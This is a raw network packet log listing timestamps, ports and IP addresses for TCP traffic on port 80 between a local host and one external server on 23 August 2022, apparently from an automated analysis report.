Aug 23, 2022 18:23:58.915467978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915479898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915486097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915530920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915551901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915566921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915577888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915589094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915606022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915608883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915622950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915638924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915642977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915659904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915659904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915678978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915687084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915694952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915703058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915710926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915719986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915728092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.915735960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915752888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915779114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.917799950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.917823076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.917865038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.917884111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.927977085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.927995920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928075075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928111076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928184986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928222895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928244114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928260088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928345919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928363085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928400040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928409100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928426981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928461075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928464890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928495884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928503036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928539038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928561926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928576946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928581953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928602934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928606033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928627014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928627968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928643942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928648949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928667068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928668022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928683996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928685904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928704977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928723097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928731918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928740978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928755045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928774118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928786039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928817034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928822041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928838968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928878069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928884029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928901911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928939104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.928946018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928980112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.928983927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929050922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929075003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929095030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929095030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929116964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929121017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929136992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929142952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929160118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929161072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929182053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929186106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929203987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929208994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929224014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929229975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929246902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929248095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929264069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929269075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929280043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929286003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929295063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.929302931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929318905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.929336071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.945723057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.945749044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.945765018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.945795059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.945827007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.945862055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.946078062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.946150064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.946172953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.946188927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.946208954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969147921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969201088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969224930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969254017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969280005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969281912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969302893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969321966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969324112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969342947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969369888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969397068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969472885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969500065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969518900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969521046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969546080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969546080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969571114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969571114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969588995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969609022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969609976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969625950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969647884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969660997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969662905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969696999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969698906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969717979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969731092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969732046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969750881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969768047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969809055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969831944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969856024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969871044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.969872952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969903946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.969927073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970113039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970145941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970154047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970168114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970182896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970186949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970204115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970220089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970303059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970334053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970376015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970395088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970413923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970460892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970623016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970669031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970690012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970707893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970715046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970726967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970757961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970768929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970776081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970820904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970839977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.970870972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970902920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.970962048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971009016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971036911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971055984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971069098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971090078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971112967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971209049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971241951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971268892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971287966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971292019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971318007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971342087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971388102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971414089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971427917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971438885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.971477032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.971529007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972090006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972119093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972141981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972143888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972157955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972160101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972184896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972202063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972531080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972585917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972610950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972634077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972637892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972656965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972656965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972687960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972700119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.972713947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.972742081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974164963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974198103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974221945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974246025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974248886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974272966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974286079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974294901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974315882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974339962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974596024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974638939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974649906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974663973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974687099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974689960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974710941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974710941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974734068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974735022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974752903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974757910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974778891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974782944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974805117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974806070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974824905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.974832058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974852085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.974880934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.976773024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.976804972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.976829052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.976845980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.976861954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.976901054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977638006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977680922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977715969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977744102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977755070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977762938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977777958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977790117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977812052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977826118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977839947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.977850914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.977875948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005606890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005631924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005649090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005682945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005698919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005698919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005714893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005731106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005738020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005755901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005764961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005798101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005825043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005841017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005852938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005872965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005882978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.005963087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.005989075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006001949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006006956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006025076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006036043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006062031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006083965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006103039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006120920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006169081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006171942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006231070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006268978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006366014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006397009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006405115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006421089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006433010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006438017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006444931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.006468058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.006486893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007033110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007050037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007066011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007112026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007287025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007589102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007643938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007653952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007698059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007704973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007719040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007735968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007742882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007761002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007771015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007772923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007818937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007870913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007889032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007915020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007921934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:59.007934093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:59.007936954 CEST	80	49827	45.95.11.158	192.168.2.3
